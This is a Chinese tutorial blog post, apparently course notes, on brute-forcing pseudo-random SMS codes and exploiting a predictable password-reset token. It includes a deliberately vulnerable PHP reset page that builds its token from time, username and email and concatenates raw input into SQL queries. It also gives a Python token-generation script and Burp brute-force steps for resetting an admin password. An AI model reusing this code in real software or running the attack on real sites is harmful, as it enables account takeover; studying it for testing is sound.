伪随机码和密码找回漏洞

最新推荐文章于 2023-10-21 08:15:00 发布
最新推荐文章于 2023-10-21 08:15:00 发布
阅读量518 收藏 1
点赞数
分类专栏: 暗月笔记 文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RMC131/article/details/130142102
版权

伪随机码漏洞

伪随机码结构可以预先确定,重复产生和复制,具有某种随机序列的随机特性的序列号。Web开发中伪随机码主要用于确定范围,php中rand()函数可以产生随机数例如:rand(000000,999999),一般是手机验证码

可通过穷举可以绕过

burp–>Intruder–>Sniper–>Payload(Number)

How many: 填写完回车一下

防御方法

设置失败次数,超过次数后数值无效

设置提交时间间隔

密码找回漏洞

为防止用户遗忘密码,网站都会提供密码找回功能,常见方式有:邮箱,密码保护问题,手机号等。在找回密码时,如果除了自己的密码还能找回其他用户的密码,就说明存在密码找回漏洞。它属于逻辑漏洞的一种,占了较大的比例。

(也是测试逻辑漏洞的方法)测试的步骤

熟悉业务流程,对流程中的HTTP请求分析

例子

<?php
include 'init.php';
function create_pass($username,$email){
        $token=md5(time().$username.$email);
        return $token;
}
echo ' <meta charset="UTF-8">';

if($_GET['c']=='forget'){
        
        $username= trim($_POST['username']);
        
        $re=mysql_query("select * from member where username='{$username}'");
        
        $row = mysql_fetch_array($re);
        
        $_email = $row['email'];

        if($row){
                
                echo "<form method='post' action='?c=email'>";
                echo "用户{$row['username']}存在  请输入用户的邮箱";
                echo "<input type='text' name='email'/>";
                echo "<input type='hidden' name='username' value='{$row['username']}'/>";
                echo "<input type='submit' value='发送key'/></form>";
        
        }
}

if($_GET['c']=='email'){
        $username= trim($_POST['username']);
        $re=mysql_query("select * from member where username='{$username}'");
        $row = mysql_fetch_array($re);
        
        $email= trim($_POST['email']);
        
        if($email == $row['email']){
                $token=create_pass($row['username'],$row['email']);
                mysql_query("update member set token='{$token}' where id='{$row['id']}'");
                echo "密码已发送又邮件,请登录邮箱修改密码";
                
                
        }else{
                echo "邮箱错误 请填写对应的邮箱";
        }
}


if($_GET['c']=='send'){
        
        $token = trim($_GET['token']);
        
        $re = mysql_query("select * from member where token='{$token}'");
        $row = mysql_fetch_array($re);
        if($row){

                echo "<form method='post' action='?c=pass'>";
                echo "输入你要修改的密码 ";
                echo "<input type='text' name='password'/>";
                echo "<input type='hidden' name='token' value='{$token}'/>";
                echo "<input type='submit' value='修改密码'>";     
        }
}


if($_GET['c']=='pass'){
        $token = $_POST['token'];
        $password =md5(trim($_POST['password']));
        $re = mysql_query("update member set password ='{$password}' where token = '{$token}'");
        
        if($re){
                echo "修改成功";
        }else{
                echo "修改失败";   
        }
}


if($_GET['c']=='login'){
        
        echo '<form method="post" action="?c=main">';
        echo '用户 <input type="text" name="username"><br>';
        echo '密码 <input type="password" name="password"><br>';
        echo '<input type="submit" value="登录">';
        echo '</form>';
}


if($_GET['c']=='main'){
        $username = $_POST['username'];
        $password = md5($_POST['password']);
        $re = mysql_query("select * from member where username='{$username}' and password='{$password}'");
        $row = mysql_fetch_array($re);
        if($row){
                echo "{$row['username']} 登录成功";
        }else{
                        echo "帐号或密码失败";
        }     
}
if(empty($_GET['c'])){
echo '<form method="post" action="?c=forget">';
echo '<label>请输入你要查询的用户</label>';
echo '<input type="text" name="username">';
echo '<input type="submit" value="找回密码">';
echo '</form>';
}
?>

生成token的关键代码:

function create_pass($username,$email){
        $token=md5(time().$username.$email);
        return $token;
}

这里token的生成时可预测的,简单写一个python脚本

import time
import datetime
import hashlib

def md5_time():
	hl = hashlib.md5()
	t = int(time.time())
	username = "admin"
	email = "moon@moonsec.com"
	text = str(t) + username + email
	hl.update(text.encode(encoding='utf8'))
	md5=hl.hexdigest()
	print(str(md5))


if __name__ == "__main__":
	for i in range(60):
		md5_time()
		time.sleep(1)

测试python生成的token是否与php相同

<?php
$username = "admin";
$email = "moon@moonsec.com";
$token=md5(time().$username.$email);
echo $token;
?>
  • 先运行python脚本,后更改密码,用户名admin,邮箱moon@moonsec.com
  • 显示发送邮件后,停止python,复制生成的内容作为payload
  • 访问http://www.webtester.com/forget.php?c=send&token=b903af2df8c9d53184cf6c3cb792b296
  • burp抓包用生成的payload穷举token,得到正确的token
  • 访问http://www.webtester.com/forget.php?c=send&token=正确的token,更改密码,然后访问http://www.webtester.com/forget.php?c=login测试登录,可以使用admin+更改的的密码登录
RICKC131
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
C#使用伪随机数实现加密用户密的方法
09-04
在C#编程中,安全地存储用户密是至关重要的,以防止...总的来说,本示例展示了如何在C#中使用伪随机数进行简单的密加密,但为了提供全面的安全保障,开发者应该结合其他最佳实践和技术,以实现更高级别的密安全
深信服技术认证之找回密漏洞
sangfor_edu的博客
05-07 1730
找回密漏洞概述 找回密是逻辑漏洞中密重置的一种场景,经常出现在用户找回密页面等涉及到网站密重置的页面。攻击者在用户登录页面,没有获取到用户的账号和密,无法查看该用户的账户信息,想通过找回密的位置尝试绕过安全验证,从而重置用户密,再进行登录,查看相关的账户信息。 找回密的步骤 1、确认用户:输入用户的账号、手机号或者邮箱等; 2、安全验证:触发服务端下发验证到接收的手机或邮箱,安全验证用户身份; 3、密重置:输入新密和确认新密; 4、登录账号:重置密成功,利用重置的新密
逻辑漏洞之验证绕过、密码找回漏洞
qq_68233961的博客
09-25 3296
逻辑漏洞之验证绕过、密码找回漏洞
网络安全进阶学习第十七课——业务逻辑漏洞(支付&&认证&&密码找回
p36273的博客
09-15 503
重置密最后一步,重置账户通过用户传递的uid或者username控制,导致修改该UID即可重置其他用户密
验证绕过、密码找回漏洞
weixin_46601374的博客
03-14 7819
问一个女孩子可以有多懒,直到最后才会一口气交完前七章的作业,平常是能拖就拖,直到要SRC了才急着补靶场。 验证作用: 验证(CAPTCHA)是“Completely Automated Public Turing test to tell Computers and Humans Apart”(全自动区分计算机和人类的图灵测试)的缩写,是一种区分用户是计算机还是人的公共全自动程序。 可以防止:恶意破解密、刷票、论坛灌水,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解方式进行不断的登..
密码找回,验证绕过漏洞详解
Y22Lee的博客
04-15 2051
在TOP10漏洞中,逻辑漏洞被称为“不安全的对象引用,和功能级访问控制缺失”!此外,逻辑漏洞也是作为渗透测试人员必须深入了解和学习的,而且日后逻辑漏洞在我们的漏洞产出中也是占据主导地位的!常见的逻辑漏洞有:越权漏洞,密需改,密码找回,验证漏洞,支付漏洞,投票/积分/抽奖,短信轰炸等;
伪随机产生及循环自相关分析MATLAB函数
10-31
在通信和信号处理领域,伪随机(Pseudo-Random Code)扮演着至关重要的角色,它们广泛用于测试、同步、编以及加密等任务。本文将详细介绍标题和描述中提到的两个MATLAB函数及其相关的知识点。 首先,我们来看第...
GPS伪随机仿真研究报告.doc
12-23
(3)伪随机广泛应用在通信、雷达、信号编等场合,伪随机的结构预先确定,可重复产生和复制,具有某种随机序列随机特性的序列。不同GPS卫星信号就是靠伪随机区别的。检测GPS信号就是检测卫星信号的伪随机...
sheji.rar_伪随机
07-14
伪随机发射verilog HDL程序 大学生电子竞赛
伪随机 FPGA源代及仿真分析
02-07
总的来说,“伪随机 FPGA 源代及仿真分析”是一个涵盖数字电路设计、FPGA 实现、硬件描述语言编程和系统级验证的综合项目。通过这个项目,我们可以学习到如何利用 FPGA 实现高效且可配置的伪随机生成器,同时...
Java Random可破解,随机数不再随机,更不安全
weixin_54542328的博客
10-21 1189
不要再用 ~Random~
逻辑漏洞-密码找回
fzy2003的博客
07-07 337
声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险和责任!
buuctf10(异或注入&中文字符绕过preg_match&伪随机漏洞seed)
weixin_63231007的博客
12-09 1852
在本题中假如路径是/index.php/config.php,浏览器的解析结果是index.php,这样才能执行index.php中的代去包含文件,而basename会返回config.php,使得highlight_file显示出config.php的内容而不是原本的index.php,因为$_SERVER['PHP_SELF']的关系,就算后面有参数如?par=123&par2=333 而 $_SERVER[“PHP_SELF”] 的值为 /test/7ghost.php
国外众测之密码找回漏洞
yggcwhat
07-05 1327
国外众测之密码找回漏洞
逻辑漏洞密码找回漏洞(semcms)
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-06 6389
目录什么是密码找回漏洞一般流程可能产生该漏洞的情况脑洞图1.用户凭证暴力破解2.返回凭证3.邮箱弱token4.用户凭证有效性5.重新绑定6.服务器验证7.用户身份验证8.找回步骤9.本地验证10.注入11.Token生成12.注册覆盖13.session覆盖演示暴破验证找回密更改id号修改admin密靶场cms下载 什么是密码找回漏洞 利用漏洞修改他人帐号密,甚至修改管理员的密。 一般流程 1 首先尝试正常找回密流程,选择不同的找回方式,记录所有数据包 2 分析数据包,找到敏感部分 3
密码找回逻辑漏洞总结
swordheart的博客
04-24 1237
0x00 背景介绍 请注意这两篇文章: 密码找回功能可能存在的问题 密码找回功能可能存在的问题(补充) 距离上两篇文档过去近半年了,最近整理密码找回的脑图,翻开收集的案例,又出现了一些新的情况,这里一并将所有见到的案例总结并分享给大家,在测试时可根据这个框架挖掘! 0x01 密码找回逻辑测试一般流程 首先尝试正常密码找回流程,选择不同找回方式,记录所有数据包 分析数据包,找到敏感部分 分析后台找回机制所采用的验证手段 修改数据包验证推测 0x02 脑图 0x03 详情 用户凭证暴力
网站安全检测之用户密码找回网站漏洞安全分析与利用
网站安全专家
08-20 844
我们SINE安全在对网站,以及APP端进行网站安全检测的时候发现很多公司网站以及业务平台,APP存在着一些逻辑上的网站漏洞,有些简简单单的短信验证可能就会给整个网站带来很大的经济损失,很简单的网站功能,比如用户密码找回上,也会存在绕过安全问题回答,或者绕过手机号,直接修改用户的账户密。 在短信炸弹,以及用户密码找回的网站漏洞上,我们来跟大家分享一下如何利用以及如何防范该漏洞的攻击。 ...
运维安全-密码找回逻辑漏洞总结
Coisini的博客
05-28 381
什么是序列密,什么是伪随机
最新发布
04-21
序列密是一种密算法,它使用一个密钥来对输入的数据序进行加密或解密。序列密通常用于保护通信中的数据隐私和完整性。 伪随机是一种看似随机但实际上是通过确定性算法生成的伪随机通常用于密学中的密钥生成、加密和解密过程中。它们具有类似于真随机的统计特性,但可以通过相同的算法和种子再次生成相同的序列。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值